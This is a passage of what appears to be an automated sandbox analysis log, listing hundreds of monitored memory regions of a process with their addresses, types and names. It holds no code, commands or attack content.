pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22942 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22943 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22944 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22945 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22946 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22947 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22948 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22949 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22950 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22951 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22952 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22953 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22954 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22955 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22956 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22957 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22958 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22959 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22960 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22961 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22962 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22963 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22964 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22965 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22966 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22967 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22968 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22969 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22970 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22971 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22972 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22973 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22974 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22975 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22976 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22977 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22978 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22979 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22980 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22981 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22982 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22983 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22984 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22985 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22986 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22987 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22988 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22989 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22990 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22991 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22992 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22993 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22994 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22995 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22996 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22997 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22998 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22999 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23000 start_va = 0x26d0000 end_va = 0x26d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23001 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23002 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23003 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23004 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23005 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23006 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23007 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23008 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23009 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23010 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23011 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23012 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23013 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23014 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23015 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23016 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23017 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23018 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23019 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23020 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23021 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23022 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23023 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23024 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23025 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23026 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23027 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23028 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23029 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23030 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23031 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23032 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23033 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23034 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23035 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23036 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23037 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23038 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23039 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23040 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23041 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23042 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23043 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23044 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23045 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23046 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23047 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23048 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23049 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23050 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23051 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23052 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23053 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23054 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23055 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23056 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23057 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23058 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23059 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23060 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23061 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23062 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23063 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23064 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23065 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23066 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23067 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23068 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23069 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23070 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23071 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23072 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23073 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23074 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23075 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23076 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23077 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 23078 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23079 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23080 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23081 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23082 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23083 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23084 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23085 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23086 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23087 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23088 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23089 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23090 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23091 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23092 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23093 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23094 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23095 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23096 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23097 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23098 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23099 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23101 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23102 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23103 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23104 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23105 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23106 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23107 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23108 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23109 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23110 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23111 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23112 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23113 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23114 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23115 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23116 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23117 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23118 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23119 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23120 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23121 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23122 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23123 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23124 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23125 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23126 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23127 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23128 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23129 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23130 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23131 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23132 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23133 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23134 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23135 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23136 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23137 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23138 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23139 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23140 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23141 start_va = 0x570000 end_va = 0x57ffff monitored = 1 